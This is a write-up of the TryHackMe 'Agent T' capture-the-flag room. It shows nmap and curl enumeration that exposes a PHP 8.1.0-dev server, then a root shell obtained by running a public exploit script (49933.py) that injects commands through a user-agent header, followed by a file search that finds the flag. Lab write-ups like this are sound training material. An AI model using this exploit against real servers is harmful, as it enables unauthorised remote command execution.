TryHackMe | Agent T writeup
This is one (of many) walkthrough for the Agent T CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.
Enumeration
As usual, I use nmap to see which ports are open.
nmap -sCV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-05 15:22 GMT
Nmap scan report for ip-10-10-29-63.eu-west-1.compute.internal (10.10.29.63)
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later
|_http-title: Admin Dashboard
MAC Address: 02:42:9E:A9:F8:49 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 secondsFrom this command, you notice the existence of a web server on port 80. Let’s try to access the web page and see if there is anything for us. Nothing promising stands out after reviewing the HTML source code, except that the web page looks really awesome 🤓. For next step, I tried to use gobuster to brute force some URIs.
From gobuster, something seemed off as all requests returned 200_OK. With that in mind, we needed to find another to get in. Following a hint from the CTF it seemed that we needed to look closely to the HTTP headers when requesting the main page.
# FROM THM VM
curl -I http://IP-ADDRESS
HTTP/1.1 200 OK
Host: $IP-ADDRESS
Date: Sun, 05 Mar 2023 15:42:17 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8From the output, I was quite curious about the x-powered-by header. It seemed that a development version was being used to provide the website. How about we try to find any exploit available for this particular version of PHP? Thankfully, an exploit was found during my search. You can find it here. In a nutshell this python script is sending system commands through the user-agent T.
By executing the python script, we could start sending system commands to the server. For the sake of simplicity, you can find all the commands used in the exploit below.
# Execute the exploit script
$ python 49933.py
Enter the full host url:
http://$IP-ADDRESS
Interactive shell is opened on http://IP-ADDRESS
Can't acces tty; job crontol turned off.
$ whoami
root
$ ls -la
total 760
drwxr-xr-x 1 root root 4096 Mar 7 2022 .
drwxr-xr-x 1 root root 4096 Mar 30 2021 ..
-rw-rw-r-- 1 root root 199 Mar 5 2022 .travis.yml
-rw-rw-r-- 1 root root 22113 Mar 5 2022 404.html
-rw-rw-r-- 1 root root 21756 Mar 5 2022 blank.html
drwxrwxr-x 2 root root 4096 Mar 5 2022 css
-rw-rw-r-- 1 root root 3784 Mar 5 2022 gulpfile.js
drwxrwxr-x 2 root root 4096 Mar 5 2022 img
-rw-rw-r-- 1 root root 42145 Mar 7 2022 index.php
drwxrwxr-x 3 root root 4096 Mar 5 2022 js
-rw-rw-r-- 1 root root 642222 Mar 5 2022 package-lock.json
-rw-rw-r-- 1 root root 1493 Mar 5 2022 package.json
drwxrwxr-x 4 root root 4096 Mar 5 2022 scss
drwxrwxr-x 8 root root 4096 Mar 5 2022 vendor
# nothing really happens here
$ cd ..
# staying in the same folder
$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor
$ find / -type f -name "*.txt" 2>/dev/null
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/util-linux/col.txt
/var/www/html/vendor/fontawesome-free/LICENSE.txt
/flag.txt
From the result of the find command, you can find a txt file containing a flag. Go grab it!
Conclusion
This CTF was pretty chill and funny at the same time. Kudos to ben, jonhhammond, cmnatic, blacknote and timtaylor for creating this one! 👍
